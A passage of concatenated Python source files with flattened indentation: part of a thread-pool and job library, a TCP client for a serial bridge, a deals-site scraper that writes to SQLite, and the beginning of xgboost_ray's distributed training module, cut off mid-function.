once (bool): Whether the callback is valid only once.
"""
if not callable(callback):
raise TypeError('callback must be callable')
if isinstance(event, str):
event = [event]
for evn in event:
if evn not in self.__listeners:
raise ValueError('invalid event type: {0!r}'.format(evn))
for evn in event:
event_passed = False
with synchronized(self):
event_passed = (evn in self.__event_set)
if not (once and event_passed):
self.__listeners[evn].append(Job._Listener(callback, once))
# If the event already happened, we'll invoke the callback
# immediately to make up for what it missed.
if event_passed:
callback(self, event)
def wait(self, timeout=None):
"""
Waits for the job to finish and returns the result.
# Arguments
timeout (number, None): A number of seconds to wait for the result
before raising a #Timeout exception.
# Raises
Timeout: If the timeout limit is exceeded.
"""
def cond(self):
return self.__state not in (Job.PENDING, Job.RUNNING) or self.__cancelled
if not wait_for_condition(self, cond, timeout):
raise Job.Timeout
return self.result
def start(self, as_thread=True, daemon=False, __state_check=True):
"""
Starts the job. If the job was run once before, resets it completely. Can
not be used while the job is running (raises #InvalidState).
# Arguments
as_thread (bool): Start the job in a separate thread. This is #True by
default. Classes like the #ThreadPool calls this function from its own
thread and passes #False for this argument.
daemon (bool): If a thread is created with *as_thread* set to #True,
defines whether the thread is started as a daemon or not. Defaults to
#False.
# Returns
Job: The job object itself.
"""
if __state_check:
# We need to manually manage the lock to be able to release it
# pre-emptively when needed.
with synchronized(self):
if self.__cancelled and self.__state == Job.PENDING:
# Cancelled in PENDING state. Do not run the target function at all.
self.__state = Job.CANCELLED
assert self.__exception is None
assert self.__result is None
self._trigger_event(Job.CANCELLED)
return None
if self.__state == Job.RUNNING:
raise Job.InvalidState('job is already running')
elif self.__state not in (Job.PENDING, Job.ERROR, Job.SUCCESS, Job.CANCELLED):
raise RuntimeError('invalid job state {0!r}'.format(self.__state))
# Reset the Job attributes.
self.__state = Job.RUNNING
self.__cancelled = False
self.__result = None
self.__exception = None
self.__event_set.clear()
self.__thread = None
# Remove all listeners that have been registered with the "once" flag.
for listeners in self.__listeners.values():
listeners[:] = (l for l in listeners if not l.once)
if as_thread:
thread = threading.Thread(target=self.start, args=(False, False, False))
thread.setDaemon(daemon)
with synchronized(self):
assert not self.__thread or not self.__thread.running
self.__thread = thread
thread.start()
return self
try:
result = None
exception = None
try:
result = self.run()
state = Job.SUCCESS
except Exception: # XXX: Catch BaseException?
if self.print_exc:
traceback.print_exc()
exception = Job.ExceptionInfo(*sys.exc_info())
state = Job.ERROR
with synchronized(self):
cancelled = self.__cancelled
self.__result = result
self.__exception = exception
self.__state = Job.CANCELLED if cancelled else state
self._trigger_event(state)
finally:
with synchronized(self):
notify_all(self)
if self.__dispose_inputs:
self.__target = None
self.__args = None
self.__kwargs = None
self.data = None
for listeners in self.__listeners.values():
listeners[:] = []
return self
def run(self):
"""
This method is the actual implementation of the job. By default, it calls
the target function specified in the #Job constructor.
"""
if self.__target is not None:
return self.__target(self, *self.__args, **self.__kwargs)
raise NotImplementedError
@staticmethod
def factory(start_immediately=True):
"""
This is a decorator function that creates new `Job`s with the wrapped
function as the target.
# Example
```python
@Job.factory()
def some_longish_function(job, seconds):
time.sleep(seconds)
return 42
job = some_longish_function(2)
print(job.wait())
```
# Arguments
start_immediately (bool): #True if the factory should call #Job.start()
immediately, #False if it should return the job in pending state.
"""
def decorator(func):
def wrapper(*args, **kwargs):
job = Job(task=lambda j: func(j, *args, **kwargs))
if start_immediately:
job.start()
return job
return wrapper
return decorator
def as_completed(jobs):
''' Generator function that yields the jobs in order of their
completion. Attaches a new listener to each job. '''
jobs = tuple(jobs)
event = threading.Event()
callback = lambda f, ev: event.set()
[job.add_listener(Job.SUCCESS, callback, once=True) for job in jobs]
[job.add_listener(Job.ERROR, callback, once=True) for job in jobs]
while jobs:
event.wait()
event.clear()
jobs, finished = split_list_by(jobs, lambda x: x.finished)
for job in finished:
yield job
# ThreadPool API
# ============================================================================
class ThreadPool(object):
"""
This class represents a pool of threads that can process jobs up to a certain
number of maximum concurrent workers. Jobs can be submitted directly (from
a #~Job.PENDING state) or functions can be passed. The worker-threads will be
started when the ThreadPool is created.
Make sure to call #ThreadPool.shutdown() at some point. You can also use a
`with`-statement.
# Example
```python
from nr.concurrency import ThreadPool, as_completed
with ThreadPool() as pool:
jobs = []
for data in get_data_to_process():
jobs.append(pool.submit(process_data, data))
for job in as_completed(jobs):
print(job.result)
```
# Parameters
max_workers (int): The number of worker threads to spawn. Defaults to the
number of cores on the current machines processor (see #cpu_count()).
print_exc (bool): Forwarded to the #Job objects that are created with
#ThreadPool.submit().
"""
class _Worker(Synchronizable, threading.Thread):
def __init__(self, queue):
super(ThreadPool._Worker, self).__init__()
self.__queue = queue
self.lock = threading.Lock()
self.current = None
def run(self):
while True:
item = self.__queue.get()
try:
if item is None:
break
with self.lock:
self.current = item
item.start(as_thread=False)
except:
# Exception won't make the _Worker shut down.
traceback.print_exc()
finally:
self.__queue.task_done()
with self.lock:
self.current = None
def __init__(self, max_workers, print_exc=True, dispose_inputs=False):
super(ThreadPool, self).__init__()
self.__queue = SynchronizedDeque()
self.__threads = [self._Worker(self.__queue) for i in range(max_workers)]
self.__running = False
self.dispose_inputs = dispose_inputs
self.print_exc = print_exc
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.shutdown(wait=True)
def __len__(self):
return len(self.__queue)
def start(self):
"""
Starts the #ThreadPool. Must be ended with #stop(). Use the context-manager
interface to ensure starting and the #ThreadPool.
"""
if self.__running:
raise RuntimeError('ThreadPool already running')
[t.start() for t in self.__threads]
self.__running = True
def pending_jobs(self):
"""
Returns a list of all Jobs that are pending and waiting to be processed.
"""
return self.__queue.snapshot()
def current_jobs(self):
"""
Returns a snapshot of the Jobs that are currently being processed by the
ThreadPool. These jobs can not be found in the #pending_jobs() list.
"""
jobs = []
with synchronized(self.__queue):
for worker in self.__threads:
with synchronized(worker):
if worker.current:
jobs.append(worker.current)
return jobs
def clear(self):
"""
Removes all pending Jobs from the queue and return them in a list. This
method does **no**t call #Job.cancel() on any of the jobs. If you want
that, use #cancel_all() or call it manually.
"""
with synchronized(self.__queue):
jobs = self.__queue.snapshot()
self.__queue.clear()
return jobs
def cancel_all(self, cancel_current=True):
"""
Similar to #clear(), but this function also calls #Job.cancel() on all
jobs. Also, it **includes** all jobs that are currently being executed if
*cancel_current* is True.
# Arguments
cancel_current (bool): Also cancel currently running jobs and include them
in the returned list of jobs.
# Returns
list: A list of the #Job#s that were canceled.
"""
with synchronized(self.__queue):
jobs = self.clear()
if cancel_current:
jobs.extend(self.current_jobs())
[j.cancel() for j in jobs]
return jobs
def submit(self, target=None, task=None, args=(), kwargs=None, front=False,
dispose_inputs=None):
"""
Submit a new #Job to the ThreadPool.
# Arguments
task (function, Job): Either a function that accepts a #Job, *args* and
*kwargs* or a #Job object that is in #~Job.PENDING state.
target (function): A function object that accepts *args* and *kwargs*.
Only if *task* is not specified.
args (list, tuple): A list of arguments to be passed to *job*, if it is
a function.
kwargs (dict): A dictionary to be passed as keyword arguments to *job*,
if it is a function.
front (bool): If #True, the job will be inserted in the front of the queue.
# Returns
Job: The job that was added to the queue.
# Raises
TypeError: If a #Job object was passed but *args* or *kwargs* are non-empty.
RuntimeError: If the ThreadPool is not running (ie. if it was shut down).
"""
if not self.__running:
raise RuntimeError("ThreadPool ain't running")
if dispose_inputs is None:
dispose_inputs = self.dispose_inputs
if isinstance(task, Job):
if args or kwargs:
raise TypeError('can not provide additional arguments for Job')
if task.state != Job.PENDING:
raise RuntimeError('job is not pending')
job = task
elif task is not None:
if kwargs is None:
kwargs = {}
job = Job(task=task, args=args, kwargs=kwargs, dispose_inputs=dispose_inputs)
elif target is not None:
if kwargs is None:
kwargs = {}
job = Job(target=target, args=args, kwargs=kwargs, dispose_inputs=dispose_inputs)
else:
raise TypeError('expected Job or callable')
job.print_exc = self.print_exc
if front:
self.__queue.appendleft(job)
else:
self.__queue.append(job)
return job
def wait(self, timeout=None):
"""
Block until all jobs in the ThreadPool are finished. Beware that this can
make the program run into a deadlock if another thread adds new jobs to the
pool!
# Raises
Timeout: If the timeout is exceeded.
"""
if not self.__running:
raise RuntimeError("ThreadPool ain't running")
self.__queue.wait(timeout)
def shutdown(self, wait=True):
"""
Shut down the ThreadPool.
# Arguments
wait (bool): If #True, wait until all worker threads end. Note that pending
jobs are still executed. If you want to cancel any pending jobs, use the
#clear() or #cancel_all() methods.
"""
if self.__running:
# Add a Non-entry for every worker thread we have.
for thread in self.__threads:
assert thread.isAlive()
self.__queue.append(None)
self.__running = False
if wait:
self.__queue.wait()
for thread in self.__threads:
thread.join()
def submit_multiple(self, functions, target=False, task=False):
"""
Submits a #Job for each element in *function* and returns a #JobCollection.
"""
if target or not task:
return JobCollection([self.submit(target=func) for func in functions])
else:
return JobCollection([self.submit(task=func) for func in functions])
class JobCollection(object):
"""
A list of #Job objects. Provides useful functions for querying results.
"""
def __init__(self, jobs):
self.jobs = jobs
def __iter__(self):
return iter(self.jobs)
def wait(self):
return [j.wait() for j in self]
def as_completed(self):
return as_completed(self)
# EventQueue API
# ============================================================================
class EventQueue(object):
'''
This class represents a collection of events that can then be
fired one or all at a time from a specific thread. This is especially
useful for threaded GUI applications.
Every event has an event type which is just a name that identifies
the kind of the event. There are two kinds of event types: Ones that
can be queued multiple times and that may carry arbitrary event data
and ones that can only be queued once, with no data attached.
In non-strict mode, every event that has not been formerly declared
is queable multiple times (or: not mergeable). If a mergeable event
is already queued and another of that type is being queued, that new
event is just dropped.
'''
EventType = collections.namedtuple('EventType', 'name mergeable')
Event = collections.namedtuple('Event', 'type data timestamp')
def __init__(self, strict=True, lock=None):
super(EventQueue, self).__init__()
self.strict = strict
self.event_types = {}
self.events = collections.deque()
self.lock = lock or threading.Lock()
def __repr__(self):
with self.lock:
return '<EventQueue with {0} queued events>'.format(len(self.events))
def new_event_type(self, name, mergeable=False):
''' Declare a new event. May overwrite an existing entry. '''
self.event_types[name] = self.EventType(name, mergeable)
def add_event(self, name, data=None):
'''
Add an event of type *name* to the queue. May raise a
`ValueError` if the event type is mergeable and *data* is not None
or if *name* is not a declared event type (in strict mode).
'''
try:
mergeable = self.event_types[name].mergeable
except KeyError:
if self.strict:
raise ValueError('unknown event type {0!r}'.format(name))
mergeable = False
if mergeable and data is not None:
raise ValueError('mergable event can not have data attached')
with self.lock:
if mergeable:
# Check if such an event already exists.
for ev in self.events:
if ev.type == name:
return
self.events.append(self.Event(name, data, time.clock()))
def pop_event(self):
'''
Pop the next queued event from the queue.
:raise ValueError: If there is no event queued.
'''
with self.lock:
if not self.events:
raise ValueError('no events queued')
return self.events.popleft()
def pop_events(self):
'''
Pop all events and return a `collections.deque` object. The
returned container can be empty. This method is preferred over
`pop_event()` as it is much faster as the lock has to be acquired
only once and also avoids running into an infinite loop during
event processing.
'''
with self.lock:
events = self.events
self.events = collections.deque()
return events
# SynchronizedDeque API
# ============================================================================
class SynchronizedDeque(Synchronizable):
"""
Thread-safe wrapper for the `collections.deque`. Behaves similar to a
#queue.Queue object. If used as a data- or task-queue, #task_done() must
be called after an item has been processed!
"""
Timeout = Timeout
class Empty(Exception):
" Raised when the #SynchronizedDeque is empty. "
def __init__(self, iterable=()):
super(SynchronizedDeque, self).__init__()
self._deque = collections.deque(iterable)
self._tasks = len(self._deque)
def __iter__(self):
raise RuntimeError('SynchronizedDeque does not support iteration')
@synchronized
def snapshot(self):
return list(self._deque)
@synchronized
def __bool__(self):
return bool(self._deque)
@synchronized
def __len__(self):
return len(self._deque)
@synchronized
def clear(self):
"""
Clears the queue. Note that calling #wait*( immediately after clear can
still block when tasks are currently being processed since this method can
only clear queued items.
"""
self._tasks -= len(self._deque)
self._deque.clear()
notify_all(self)
@synchronized
def append(self, x):
try:
return self._deque.append(x)
finally:
self._tasks += 1
notify_all(self)
@synchronized
def appendleft(self, x):
try:
return self._deque.appendleft(x)
finally:
self._tasks += 1
notify_all(self)
@synchronized
def extend(self, iterable):
count = len(self._deque)
try:
return self._deque.extend(iterable)
finally:
self._tasks += len(self._deque) - count
notify_all(self)
@synchronized
def extendleft(self, iterable):
count = len(self._deque)
try:
return self._deque.extendleft(iterable)
finally:
self._tasks += len(self._deque) - count
notify_all(self)
@synchronized
def pop(self):
try:
return self._deque.pop()
finally:
notify_all(self)
@synchronized
def popleft(self):
try:
return self._deque.popleft()
finally:
notify_all(self)
@synchronized
def rotate(self, n):
return self._deque.rotate(n)
@synchronized
def task_done(self):
if self._tasks == 0:
raise RuntimeError('task_done() called too often')
assert self._tasks > 0
self._tasks -= 1
notify_all(self)
@synchronized
def get(self, block=True, timeout=None, method='pop'):
"""
If *block* is True, this method blocks until an element can be removed from
the deque with the specified *method*. If *block* is False, the function
will raise #Empty if no elements are available.
# Arguments
block (bool): #True to block and wait until an element becomes available,
#False otherwise.
timeout (number, None): The timeout in seconds to use when waiting for
an element (only with `block=True`).
method (str): The name of the method to use to remove an element from the
queue. Must be either `'pop'` or `'popleft'`.
# Raises
ValueError: If *method* has an invalid value.
Timeout: If the *timeout* is exceeded.
"""
if method not in ('pop', 'popleft'):
raise ValueError('method must be "pop" or "popleft": {0!r}'.format(method))
t_start = time.clock()
while not self:
if not block:
raise self.Empty
if timeout is None:
wait(self)
else:
t_delta = time.clock() - t_start
if t_delta > timeout:
raise Timeout
wait(self, timeout - t_delta)
return getattr(self, method)()
@synchronized
def wait(self, timeout=None):
"""
Waits until all tasks completed or *timeout* seconds passed.
# Raises
Timeout: If the *timeout* is exceeded.
"""
t_start = time.clock()
if not wait_for_condition(self, lambda s: s._tasks == 0, timeout):
raise Timeout
# Utils
# ============================================================================
class Clock(object):
"""
This class is a utility to partition a main loop into chunks at a fixed
framerate. This is useful for Game/UI main loops.
# Parameters
seconds (number): The number of seconds to wait for each pass. Can be omitted
if *fps* is specified instead.
fps (number): The frame rate for the clock. Can be omitted if *seconds*
is specified instead.
"""
def __init__(self, seconds=None, fps=None):
if seconds is not None:
seconds = float(seconds)
elif fps is not None:
seconds = 1.0 / float(fps)
else:
raise ValueError('seconds or fps must be specified')
self.seconds = seconds
self.last = -1
def sleep(self):
"""
Sleeps until the interval has passed since the last time this function was
called. This is a synonym for #__call__(). The first time the function is
called will return immediately and not block. Therefore, it is important to
put the call at the beginning of the timed block, like this:
# Example
```python
clock = Clock(fps=50)
while True:
clock.sleep()
# Processing ...
```
"""
current = time.time()
if self.last < 0:
self.last = current
return
delta = current - self.last
if delta < self.seconds:
time.sleep(self.seconds - delta)
self.last = time.time()
__call__ = sleep
def split_list_by(lst, key):
"""
Splits a list by the callable *key* where a negative result will cause the
item to be put in the first list and a positive into the second list.
"""
first, second = [], []
for item in lst:
if key(item):
second.append(item)
else:
first.append(item)
return (first, second)
def reraise(tpe, value, tb=None):
" Reraise an exception from an exception info tuple. "
Py3 = (sys.version_info[0] == 3)
if value is None:
value = tpe()
if Py3:
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
else:
exec('raise tpe, value, tb')
|
client.py | import socket
import threading
import logging
from collections import deque
class SerialClient():
MAX_ERROR = 5
def __init__(self, client_socket: socket.socket,
address,
on_disconnect=lambda self: None,
on_connect=lambda self: None,
on_received=lambda data: None):
self.socket = client_socket
self.address = address
self.thread = None
self._stop = False
self._buffersize = 1024
self.logger = logging.getLogger("Client{}".format(address))
self.err_cnt = 0
# self._on_received = (lambda x: None) if on_received is None else on_received
try:
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 1)
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1)
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 3)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
except AttributeError:
pass # XXX not available on windows
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.settimeout(2)
self.history = deque(maxlen=10)
self._on_received = on_received
self._on_disconnect = on_disconnect
self._on_connect = on_connect
def __eq__(self, other):
return self.address == other.address
def __hash__(self):
return hash(self.address)
def set_on_received(self, on_received):
self._on_received = on_received
def start(self):
self.logger.debug("start")
self.err_cnt = 0
self.thread = threading.Thread(target=SerialClient.run, args=(self, ))
self.thread.start()
def on_received(self, data):
"""
Dummy method
Data received from TCP
"""
self.logger.debug("received: {}".format(data))
if '\x1b[A\r'.encode() in data:
self.send(self.history.pop())
else:
self.history.append(data)
self._on_received(data)
def send(self, data):
"""
Send from serial to the TCP socket
:param data:
:return:
"""
self.logger.debug("send: {}".format(data))
self.socket.sendall(data)
def stop(self):
self._stop = True
def run(self):
self.logger.info('connected')
try:
self.socket.sendall('Connection established: {}\r\n'.format(self.address).encode())
except Exception as e:
self.logger.error('send connection data failed: {}'.format(e))
self.err_cnt += 1
self._on_connect(self)
while not self._stop:
try:
data = self.socket.recv(self._buffersize)
if len(data):
self.on_received(data)
else:
self.logger.error("receive null")
self.err_cnt += 1
except socket.timeout:
continue
except Exception as e:
self.logger.error("receive failed: {}".format(e))
self.err_cnt += 1
if self.err_cnt > self.MAX_ERROR:
self.logger.warning("error count > {}".format(self.MAX_ERROR))
self.stop()
self.logger.debug("stop")
self.socket.close()
self._on_disconnect(self)
# self.thread = None
|
main.py | # coding:utf-8
import time
import threading
import queue
import datetime
import re
import os
import logging
import requests
from bs4 import BeautifulSoup
from sqlalchemy import create_engine
from sqlalchemy import Column, DateTime, Integer, String, ForeignKey
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
# todo:
# 1.使用flask构建看板页面
# 2.进行数据分析
# 性能问题:
# 多线程创建多个session(15个左右)引发的database locked, sqlite的性能限制,增加请求延迟或增加数据库的timeout时间,
# 减少线程数(使用线程池或异步),采取将请求线程与处理线程分开的方法(最开始的方法)。
# 连接数据库
engine = create_engine('sqlite:///smzdm.db')
# 基本类
Base = declarative_base()
Session = sessionmaker(bind=engine)
# 日志记录
logging.basicConfig(filename=os.path.join(os.path.dirname(__file__), 'log.txt'),
format="%(levelname)s:%(name)s:%(asctime)s:%(message)s",
level=logging.INFO)
logger = logging.getLogger(os.path.basename(__file__))
class ItemSpider(threading.Thread):
"""爬取smzdm精选好价页面物品信息
参数--target_address url地址
--keyword 搜索物品的参数,暂未完成(页面解析方法不一样)
示例--itemspider = ItemSpider("https://www.smzdm.com/jingxuan/p1")
itemspider.start()"""
divs = queue.Queue()
def __init__(self, target_address, keyword=None):
threading.Thread.__init__(self)
self.target_address = target_address
self.keyword = keyword
def run(self):
r = requests.get(self.target_address, params=self.keyword, headers={"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36"})
soup = BeautifulSoup(r.content, "html.parser")
# 保存网页测试用
# with open(r".\saved.html", "wb") as f:
# f.write(r.content)
div_row = soup.select('.feed-row-wide')
if len(div_row)>0:
self.divs.put(div_row)
# print('正在处理...数量:{},使用线程:{}'.format(len(div_row), threading.current_thread()))
else:
pass
@staticmethod
def analyze(div_row, session):
for line in div_row:
content = line.select_one('.z-feed-content')
# 商品名字
temp_name = content.select_one('div h5').a.string.strip()
# 商品地址
temp_url = content.select_one('div h5').a['href']
# 商品id
item_id = re.match(r".*/(\d+)/", temp_url).group(1)
old_item = session.query(Item).filter(Item.item_id==item_id).scalar()
# 商品图片url
temp_img = line.select_one('.z-feed-img').select_one('img')['src']
# 商品值不值得买
zhi = int(content.select_one('.icon-zhi-o-thin').next_sibling.string)
buzhi = int(content.select_one('.icon-buzhi-o-thin').next_sibling.string)
# 更新老商品的评价
if old_item:
old_item.zhi = zhi
old_item.buzhi = buzhi
continue
# 商品更新日期
temp_time = datetime.datetime.fromtimestamp(int(line['timesort']))
# print('更新日期:', temp_time)
# 商品价格
temp_price = content.select_one('.z-highlight')
try:
temp_price = temp_price.get_text().strip()
except:
logger.warning('item:{}price:{}'.format(temp_url, temp_price))
item = Item(name=temp_name, item_id=item_id, url=temp_url, img=temp_img,
update_time=temp_time, price=temp_price, zhi=zhi, buzhi=buzhi)
session.add(item)
# print(item)
# stdout输出延迟
# time.sleep(1)
session.commit()
class Item(Base):
__tablename__ = 'items'
id = Column(Integer, primary_key=True)
name = Column(String)
item_id = Column(Integer)
zhi = Column(Integer)
buzhi = Column(Integer)
price = Column(String)
url = Column(String)
img = Column(String)
update_time = Column(DateTime)
def __init__(self, name, item_id, url, img, update_time, price, zhi, buzhi):
"""定义实例属性,方便自定义数据"""
self.name = name
self.item_id = item_id
self.url = url
self.img = img
self.update_time = update_time
self.zhi = zhi
self.buzhi = buzhi
self.price =price
def __repr__(self):
return("商品名字:{}\n详细地址:{}".format(self.name, self.url))
# return("商品名字:{}\n详细地址:{}\n价格:{}\n值↑:{} 不值↓:{}\n更新日期:{}\n缩略图:{}".format(self.name,
# self.url,
# self.price,
# self.zhi,
# self.buzhi,
# self.update_time,
# self.img))
def start_analyze():
session = Session()
while True:
try:
div_row = ItemSpider.divs.get(timeout=3)
# print('解析中...')
ItemSpider.analyze(div_row, session)
except queue.Empty:
logger.info('all pages finished')
break
except Exception as e:
logger.warning('analyze_warning:{}'.format(e))
continue
session.close()
if __name__=="__main__":
# 若没有数据库就创建
Base.metadata.create_all(engine)
# 预设的一些可爬取页面
urls = {'all':"https://www.smzdm.com/jingxuan/p",
'inland':"https://www.smzdm.com/jingxuan/xuan/s0f0t0b0d1r0p",
'haitao':"https://www.smzdm.com/jingxuan/xuan/s0f0t0b0d2r0p",
'quanma':"https://www.smzdm.com/jingxuan/xuan/s0f0t0b0d0r2p",
'huodong':"https://www.smzdm.com/jingxuan/xuan/s0f0t0b0d0r3p",
'computer':"https://www.smzdm.com/jingxuan/xuan/s0f163t0b0d0r0p"}
while True:
# 初始化一些变量
start_time = time.time()
# 爬取-请求线程
sem = threading.Semaphore(30)
# 爬取-处理线程
thread = threading.Thread(target=start_analyze)
thread.start()
with sem:
for i in range(1, 10):
target_address = urls['all'] + str(i)
thread = ItemSpider(target_address)
thread.start()
time.sleep(0.1)
# 计算耗时
for spider_thread in threading.enumerate()[1:]:
spider_thread.join()
logger.info('use_time:{}'.format(time.time()-start_time))
print('用时:', time.time()-start_time)
time.sleep(300)
|
main.py | from typing import Tuple, Dict, Any, List, Optional, Callable, Union, Sequence
from dataclasses import dataclass, field
from distutils.version import LooseVersion
import functools
import multiprocessing
import os
import pickle
import time
import threading
import warnings
import re
import inspect
import numpy as np
import pandas as pd
from xgboost_ray.xgb import xgboost as xgb
from xgboost.core import XGBoostError
try:
from xgboost.core import EarlyStopException
except ImportError:
class EarlyStopException(XGBoostError):
pass
from xgboost_ray.callback import DistributedCallback, \
DistributedCallbackContainer
from xgboost_ray.compat import TrainingCallback, RabitTracker, LEGACY_CALLBACK
try:
import ray
from ray import logger
from ray.exceptions import RayActorError, RayTaskError
from ray.actor import ActorHandle
from ray.util import get_node_ip_address, placement_group
from ray.util.annotations import PublicAPI, DeveloperAPI
from ray.util.placement_group import PlacementGroup, \
remove_placement_group, get_current_placement_group
from xgboost_ray.util import Event, Queue, MultiActorTask, \
force_on_current_node
if LooseVersion(ray.__version__) >= LooseVersion("1.5.0"):
# https://github.com/ray-project/ray/pull/16437
DEFAULT_PG = "default"
else:
DEFAULT_PG = None
RAY_INSTALLED = True
except ImportError:
ray = get_node_ip_address = Queue = Event = ActorHandle = logger = None
def PublicAPI(f):
@functools.wraps(f)
def inner_f(*args, **kwargs):
return f(*args, **kwargs)
return inner_f
DeveloperAPI = PublicAPI
RAY_INSTALLED = False
from xgboost_ray.tune import _try_add_tune_callback, _get_tune_resources, \
TUNE_USING_PG, is_session_enabled
from xgboost_ray.matrix import RayDMatrix, combine_data, \
RayDeviceQuantileDMatrix, RayDataIter, concat_dataframes, \
LEGACY_MATRIX
from xgboost_ray.session import init_session, put_queue, \
set_session_queue
def _get_environ(item: str, old_val: Any):
env_var = f"RXGB_{item}"
new_val = old_val
if env_var in os.environ:
new_val_str = os.environ.get(env_var)
if isinstance(old_val, bool):
new_val = bool(int(new_val_str))
elif isinstance(old_val, int):
new_val = int(new_val_str)
elif isinstance(old_val, float):
new_val = float(new_val_str)
else:
new_val = new_val_str
return new_val
@dataclass
class _XGBoostEnv:
# Whether to use SPREAD placement group strategy for training.
USE_SPREAD_STRATEGY: bool = True
# How long to wait for placement group creation before failing.
PLACEMENT_GROUP_TIMEOUT_S: int = 100
# Status report frequency when waiting for initial actors
# and during training
STATUS_FREQUENCY_S: int = 30
# If restarting failed actors is disabled
ELASTIC_RESTART_DISABLED: bool = False
# How often to check for new available resources
ELASTIC_RESTART_RESOURCE_CHECK_S: int = 30
# How long to wait before triggering a new start of the training loop
# when new actors become available
ELASTIC_RESTART_GRACE_PERIOD_S: int = 10
def __getattribute__(self, item):
old_val = super(_XGBoostEnv, self).__getattribute__(item)
new_val = _get_environ(item, old_val)
if new_val != old_val:
setattr(self, item, new_val)
return super(_XGBoostEnv, self).__getattribute__(item)
ENV = _XGBoostEnv()
xgboost_version = xgb.__version__ if xgb else "0.0.0"
LEGACY_WARNING = (
f"You are using `xgboost_ray` with a legacy XGBoost version "
f"(version {xgboost_version}). While we try to support "
f"older XGBoost versions, please note that this library is only "
f"fully tested and supported for XGBoost >= 1.4. Please consider "
f"upgrading your XGBoost version (`pip install -U xgboost`).")
# XGBoost version as an int tuple for comparisions
XGBOOST_VERSION_TUPLE = tuple(
int(x) for x in re.sub(r"[^\.0-9]", "", xgboost_version).split("."))
class RayXGBoostTrainingError(RuntimeError):
"""Raised from RayXGBoostActor.train() when the local xgb.train function
did not complete."""
pass
class RayXGBoostTrainingStopped(RuntimeError):
"""Raised from RayXGBoostActor.train() when training was deliberately
stopped."""
pass
class RayXGBoostActorAvailable(RuntimeError):
"""Raise from `_update_scheduled_actor_states()` when new actors become
available in elastic training"""
pass
def _assert_ray_support():
if not RAY_INSTALLED:
raise ImportError(
"Ray needs to be installed in order to use this module. "
"Try: `pip install ray`")
def _maybe_print_legacy_warning():
if LEGACY_MATRIX or LEGACY_CALLBACK:
warnings.warn(LEGACY_WARNING)
def _is_client_connected() -> bool:
try:
return ray.util.client.ray.is_connected()
except Exception:
return False
class _RabitTrackerCompatMixin:
"""Fallback calls to legacy terminology"""
def accept_workers(self, n_workers: int):
return self.accept_slaves(n_workers)
def worker_envs(self):
return self.slave_envs()
class _RabitTracker(RabitTracker, _RabitTrackerCompatMixin):
"""
This method overwrites the xgboost-provided RabitTracker to switch
from a daemon thread to a multiprocessing Process. This is so that
we are able to terminate/kill the tracking process at will.
"""
def start(self, nworker):
# TODO: refactor RabitTracker to support spawn process creation.
# In python 3.8, spawn is used as default process creation on macOS.
# But spawn doesn't work because `run` is not pickleable.
# For now we force the start method to use fork.
multiprocessing.set_start_method("fork", force=True)
def run():
self.accept_workers(nworker)
self.thread = multiprocessing.Process(target=run, args=())
self.thread.start()
def _start_rabit_tracker(num_workers: int):
"""Start Rabit tracker. The workers connect to this tracker to share
their results.
The Rabit tracker is the main process that all local workers connect to
to share their weights. When one or more actors die, we want to
restart the Rabit tracker, too, for two reasons: First we don't want to
be potentially stuck with stale connections from old training processes.
Second, we might restart training with a different number of actors, and
for that we would have to restart the tracker anyway.
To do this we start the Tracker in its own subprocess with its own PID.
We can use this process then to specifically kill/terminate the tracker
process in `_stop_rabit_tracker` without touching other functionality.
"""
host = get_node_ip_address()
env = {"DMLC_NUM_WORKER": num_workers}
rabit_tracker = _RabitTracker(host, num_workers)
# Get tracker Host + IP
env.update(rabit_tracker.worker_envs())
rabit_tracker.start(num_workers)
logger.debug(
f"Started Rabit tracker process with PID {rabit_tracker.thread.pid}")
return rabit_tracker.thread, env
def _stop_rabit_tracker(rabit_process: multiprocessing.Process):
logger.debug(f"Stopping Rabit process with PID {rabit_process.pid}")
rabit_process.join(timeout=5)
rabit_process.terminate()
class _RabitContext:
"""This context is used by local training actors to connect to the
Rabit tracker.
Args:
actor_id (str): Unique actor ID
args (list): Arguments for Rabit initialisation. These are
environment variables to configure Rabit clients.
"""
def __init__(self, actor_id, args):
self.args = args
self.args.append(("DMLC_TASK_ID=[xgboost.ray]:" + actor_id).encode())
def __enter__(self):
xgb.rabit.init(self.args)
def __exit__(self, *args):
xgb.rabit.finalize()
def _ray_get_actor_cpus():
# Get through resource IDs
resource_ids = ray.worker.get_resource_ids()
if "CPU" in resource_ids:
return sum(cpu[1] for cpu in resource_ids["CPU"])
return None
def _ray_get_cluster_cpus():
return ray.cluster_resources().get("CPU", None)
def _get_min_node_cpus():
max_node_cpus = min(
node.get("Resources", {}).get("CPU", 0.0) for node in ray.nodes()
if node.get("Alive", False))
return max_node_cpus if max_node_cpus > 0.0 else 1.0
def _set_omp_num_threads():
ray_cpus = _ray_get_actor_cpus()
if ray_cpus:
os.environ["OMP_NUM_THREADS"] = str(int(ray_cpus))
else:
if "OMP_NUM_THREADS" in os.environ:
del os.environ["OMP_NUM_THREADS"]
return int(float(os.environ.get("OMP_NUM_THREADS", "0.0")))
def _get_dmatrix(data: RayDMatrix, param: Dict) -> xgb.DMatrix:
if not LEGACY_MATRIX and isinstance(data, RayDeviceQuantileDMatrix):
# If we only got a single data shard, create a list so we can
# iterate over it
if not isinstance(param["data"], list):
param["data"] = [param["data"]]
if not isinstance(param["label"], list):
param["label"] = [param["label"]]
if not isinstance(param["weight"], list):
param["weight"] = [param["weight"]]
if not isinstance(param["qid"], list):
param["qid"] = [param["qid"]]
if not isinstance(param["data"], list):
param["base_margin"] = [param["base_margin"]]
param["label_lower_bound"] = [None]
param["label_upper_bound"] = [None]
dm_param = {
"feature_names": data.feature_names,
"feature_types": data.feature_types,
"missing": data.missing,
}
param.update(dm_param)
it = RayDataIter(**param)
matrix = xgb.DeviceQuantileDMatrix(it, **dm_param)
else:
